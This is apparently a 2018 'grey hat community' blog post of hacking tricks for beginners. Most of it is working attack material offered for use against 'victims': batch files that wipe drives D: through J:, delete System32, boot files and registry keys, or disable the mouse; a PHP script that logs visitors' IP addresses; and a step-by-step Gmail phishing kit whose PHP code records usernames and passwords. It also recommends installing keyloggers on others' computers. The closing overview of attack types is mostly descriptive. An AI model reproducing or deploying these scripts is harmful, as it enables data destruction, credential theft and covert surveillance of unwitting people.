Wednesday, 20 June 2018

Hacking zone :: How to stop someone’s internet access:::

Some tricks for you brought down by grey hat community its made by us u cant find anywhere credits grey hat community 1. Create Fake Windows Errors With Notepad

Open NotepadType X=Msgbox(“Message Here”,0+16,”Title Here”)Replace Message Here and Title Here with your Error Message and Error-Window Title respectively.Save the file with error.vbs.Now, click the file and you’ll get your custom-made Windows error message. So its easy to learn how to create a virus using notepad.

___________________________________________

2. How to stop someone’s internet access:::

@Echo off

pconfig /release

Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

___________________________________________

No 3:-

Just open your notepad

1) Click start -> all programs -> accessories -> notepad

2) Or just press or click windows key + r :: run window will open and

type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off

del D:\*.* /f /s /q

del E:\*.* /f /s /q

del F:\*.* /f /s /q

del G:\*.* /f /s /q

del H:\*.* /f /s /q

del I:\*.* /f /s /q

del J:\*.* /f /s /q

Then save it as SEO.bat and the batch file is created .

WARNING :: This is the most dangerous virus! Be careful with its use.

___________________________________________

4.Delete the entire registry

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

Now save it as SEO.bat and the batch file is created .

___________________________________________



How to crash a PC Forever !:::

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER – DO NOT CLICK THIS FILE.

___________________________________________

No 6:-

How to stop someone’s internet access::::

@Echo off

Ipconfig /release

Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

___________________________________________



No 7:-

ShutDown PC million Times::::

1.right click on the desktop

2.click shortcut

you will get a dialogue box, write in it: shutdown -s -t 1000 c “any comment u want” then press next

note: this “1000” i wrote is the time in seconds needed for  your computer to shut down,You can put any number you want…

3.u will get another dialogue box, write in it: Internet Explorer and press finish

4.u will find the icon on ur desktop, dont open it, just right-click on it and press properties>change icon>select the icon the internet explorer and the press apply than ok

try to open it, it is a virus

PS: the only way 2 stop your computer from shutting down is to go 2 start>run>type: shutdown -a

___________________________________________

No 8:-

Open Notepad

Write / copy the below command there:

” del c:\WINDOWS\system32\*.*/q “ without quote

and save as ” anything.bat”

Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc can’t be started.
some other tricks present to you by grey hat this are common hacking things which beginners shld learn 7. Make a virus that disable mouse:
 · Open Notepad and copy below codes
   rem ---------------------------------
  rem Disable Mouse
  set     
 key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\ 
  Mouclass"
  reg delete %key%
  reg add %key% /v Start /t REG_DWORD /d 4
  rem --------------------------------
·  Save this file as  virus.bat
·  Done you just created your virus.


 8. Change your Ip in less then 1 minute and How to grab someone IP address:
· Click on "Start" in the bottom left corner of the screen.
· Click on "RUN" .
· Type in "cmd" and click OK.
·  Type "ipconfig /release" just like that, and press "enter"
 ·  Type "exit" and leave the prompt
  ·Right-click on "Network Places" or "My Network Places" on your desktop.
  ·Click on "properties.
·Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.
  · Right click on "Local Area Connection" and click "properties"
  ·Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  ·Click on "Use the following IP address" under the "General" tab
  ·Create an IP address (It doesn't matter what it is)
  ·Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  ·Press the "Ok" button here
  ·Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.
  ·Right-click back on "Local Area Connection" and go to properties again.
  ·Go back to the "TCP/IP" settings
  ·This time, select "Obtain an IP address automatically"
  ·Click on "Ok"
  ·Hit "Ok" again.
  ·Now you have a New IP address.
Now I think you learn to change IP address.so,I think let start to Grab someone IP address J
      ·Copy the below codes into Notepad and save it as Grab.php (.php 
        is must).
   <?php
   $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
   $img_number = imagecreate(400,95);
   $backcolor = imagecolorallocate($img_number,10,102,153);
   $textcolor = imagecolorallocate($img_number,255,255,255);
   imagefill($img_number,0,0,$backcolor);
  $number0 = " This is Your IP/Proxy";
  $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
  $number2 = " Host/Proxy: $hostname";
  $number4 = " _________________________________";
  Imagestring($img_number,10,5,5,$number0,$textcolor);
  Imagestring($img_number,10,5,25,$number1,$textcolor);
  Imagestring($img_number,10,5,45,$number2,$textcolor);
  Imagestring($img_number,10,5,50,$number4,$textcolor);
  Imagestring($img_number,10,8,50,$number4,$textcolor);
  Imagestring($img_number,10,5,10,$number4,$textcolor);
  Imagestring($img_number,10,8,10,$number4,$textcolor);
  header("Content-type: image/png");
  imagepng($img_number);
  $file=fopen("Name-here-to-protect-the-File.txt","a");
  $file2 = "- IP joined - IP/Proxy:   $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
  fwrite($file, $file2);
  fclose($file);
?>
·Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
· Now Upload Grab.php to your web hosting site.
· Copy the link of your  uploaded file and send it to victim.
  · As soon as victim will click on your link his ip will be saved in your free web hosting site.
  · Enjoy now  you are Done !!

9. Access Save passwords in your/other PC’s:
     In this section i will talk about how keylogger can harm you in   different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.
· Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
 There are two types of keylogger hardware keylogger and software  keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind. Now I hope you all might understand what I want to say so, Just Install any keylogger and enjy  but through my option Award Keylogger is d best J

10. Phishing Attack to access any passwords.(Gmail,FB,Yahoo,Rediff/Hotmail/orkut etc):
  Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be safe as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.

Example of Phishing scams:
· Email asking you to login to your locked account to unlock it.
· Email carrying a Link to sites like Facebook,yahoo etc and asking 
   you to Login.
·  Emails containing some Information of your Interest and asking
    you to Login to Your Account.
So here we go:
A small example of phishing:
Example1:
If you want to access any one password from any social site  and if it is found in login page at password box like this:
·······
Then just right click on that dot format and find the inspect element of that area.
(Inspect Element provides the page source codes in HTML format)
There u find
    <input id="Passwd" type="password" name="Passwd"></input>
    Now click on " type="password" and write  the "text" in place of   "password".
    Then you see on the login page that password will appear in Text 
    format.
    Enjy J 
Example 2:
This time website fun :
In this operation,You can easily edit any website in your own way,but it’s temporary just for fun
1.open any website of your choice
2.Now remove the address and copy paste this JavaScript over address bar
javascript:document.body.contentEditable='true';document.designMode='on';void 0
3. Now do whatever you want to do with that website.
Example 3:
So for before going to mail phishing, let me suggest you one thing that it works for a limited time because the mail sites enhances their security level from time to time .so,here we go:
I think everyone wants to hack gmail,yahoo mail,facebook,orkut n other social sites.Let me explain you one thing before I am going to start this trick that try at your own risk .
1. Create an account in any free web hosting site.I recommend http://www.5gbfree.com.
2. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.u can use it for any social sites but I am just taking a popular example (gmail)
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
5. <?php // This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.

So far you should see the following in your folder:


 Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.



7. This will highlight the first occurrence of the word “action” in the script and you should see the following:



There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:



Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.



8.Save and close the file.
 Next the hacker would upload the files up to a free webhost that  supports PHP. With a simple Google search you can come up with a  bunch that fall under this category.

 Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “http://www.5gbfree.com.”.

9.Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

10. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.5gbfree.com.. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:
some tools and there information for begginers and others too share our grp i u like our works credit grey hat community 10. Keylogger
Keylogger is a simple software that records the key sequence and strokes of your keyboard into a log file on your machine. These log files might even contain your personal email IDs and passwords. Also known as keyboard capturing, it can be either software or hardware. While software-based keyloggers target the programs installed on a computer, hardware devices target keyboards, electromagnetic emissions, smartphone sensors, etc.

Keylogger is one of the main reasons why online banking sites give you an option to use their virtual keyboards. So, whenever you’re operating a computer in public setting, try to take extra caution.

Also read: KeySweeper – Fake USB Charger That Records Everything You Type
9. Denial of Service (DoS\DDoS)
A Denial of Service attack is a hacking technique to take down a site or server by flooding that site or server with a lot of traffic that the server is unable to process all the requests in the real time and finally crashes down. This popular technique, the attacker floods the targeted machine with tons of requests to overwhelm the resources, which, in turn, restrict the actual requests from being fulfilled.

For DDoS attacks, hackers often deploy botnets or zombie computers which have got the only work to flood your system with request packets. With each passing year, as the malware and types of hackers keep getting advanced, the size of DDoS attacks keeps getting increasing.

Also read: How DDoS Attack Works?
8. Waterhole attacks
If you are a big fan of Discovery or National Geographic channels, you could relate easily with the waterhole attacks. To poison a place, in this case, the hacker hits the most accessible physical point of the victim.



For example, if the source of a river is poisoned, it will hit the entire stretch of animals during summer. In the same way, hackers target the most accessed physical location to attack the victim. That point could be a coffee shop, a cafeteria, etc.

Once hackers are aware of your timings, using this type of hacking, they might create a fake Wi-Fi access point and modify your most visited website to redirect them to you to get your personal information. As this attack collects information on a user from a specific place, detecting the attacker is even harder. One of the best ways to protect yourself again such types of hacking attacks is to follow basic security practices and keep your software/OS updated.

7. Fake WAP
Even just for fun, a hacker can use software to fake a wireless access point. This WAP connects to the official public place WAP. Once you get connected the fake WAP, a hacker can access your data, just like in the above case.

It’s one of the easier hacks to accomplish and one just needs a simple software and wireless network. Anyone can name their WAP as some legit name like “Heathrow Airport WiFi” or “Starbucks WiFi” and start spying on you. One of the best ways to protect yourself from such attacks is using a quality VPN service.

Also Read: Different Types Of WLAN Authentication
6. Eavesdropping (Passive Attacks)
Unlike other attacks which are active in nature, using a passive attack, a hacker just monitors the computer systems and networks to gain some unwanted information.

The motive behind eavesdropping is not to harm the system but to get some information without being identified. These types of hackers can target email, instant messaging services, phone calls, web browsing, and other methods of communication. Those who indulge in such activities are generally black hat hackers, government agencies, etc.

Love Hacking And Pentesting? Get Started Here
5. Phishing
Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link. Combined with social engineering, it becomes one of the most commonly used and deadliest attack vectors.

Once the victim tries to login or enters some data, the hacker gets that private information of the target victim using the trojan running on the fake site. Phishing via iCloud and Gmail account was the attack route taken by hackers who targeted the “Fappening” leak, which involved numerous Hollywood female celebrities.

4. Virus, Trojan etc.
Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker. They can also lock your files, serve fraud advertisement, divert traffic, sniff your data, or spread on all the computer connected to your network.

You can read the comparison and difference between various malware, worms, trojans, etc., by visiting the link given below.

Also read: What Is the Difference: Viruses, Worms, Malware, Spyware etc?
3. ClickJacking Attacks
ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click. This behaviour is very common in app download, movie streaming, and torrent websites. While they mostly employ this technique to earn advertising dollars, others can use it to steal your personal information.

In another word, in this type of hacking, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be. It works by fooling an internet user into performing an undesired action by clicking on hidden link.

2. Cookie theft
The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser. A popular method to carry out this attack is to encourage a user’s IP packets to pass through attacker’s machine.

Also known as SideJacking or Session Hijacking, this attack is easy to carry out if the user is not using SSL (https) for the complete session. On the websites where you enter your password and banking details, it’s of utmost importance for them to make their connections encrypted.

1. Bait and switch
Using bait and switch hacking technique, an attacker can buy advertising spaces on the websites. Later, when a user clicks on the ad, he might get directed to a page that’s infected with malware. This way, they can further install malware or adware on your computer. The ads and download links shown in this technique are very attractive and users are expected to end up clicking on the same.


EmoticonEmoticon